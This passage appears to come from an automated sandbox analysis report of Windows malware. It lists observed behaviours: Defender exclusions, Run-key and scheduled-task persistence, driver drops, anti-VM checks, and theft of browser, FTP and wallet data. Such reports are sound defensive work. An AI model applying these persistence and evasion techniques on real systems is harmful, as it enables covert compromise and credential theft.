| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\Winmon.sys | C:\Windows\rss\csrss.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS7A00.tmp\Install.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\koDrfNoKNzB2KENCWBM0lY7D.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rViCrRcDjhv6WiRlx7AhYOnU.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L840sHQX0ZMsBVUxUUOA0NZC.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\j0n5PJLeTc0OYAbXRnvTjXbD.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qOetm9tnRy0yJ86ISiGCasqP.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9pMKvoh9SoYKqhCWz7Mqc3Ad.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uS9tgOhlKXy53wxxGmdxioq3.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DClVR15QZ9g2RAkdmPFcO8M9.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bUSyy6Vrhg8aXXq8sFhzrziZ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\XaSfgFUxnhzcT2cWMqIx13Hz.exe = "0" | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\CBSnoej4iNufmT6hyzvcTZte.exe = "0" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\A6jYsiO1FW5u5LjazQ6CsBo4.exe = "0" | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Manipulates WinMon driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMon | C:\Windows\rss\csrss.exe | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS7A00.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\f3yzsIS93qtqfHP3QIaqwe3D.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\f3yzsIS93qtqfHP3QIaqwe3D.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2528 set thread context of 1260 | N/A | C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
| File created | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240328021935.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| File created | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u1b0.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u1b0.0.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS7A00.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS7A00.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-522 = "N. Central Asia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
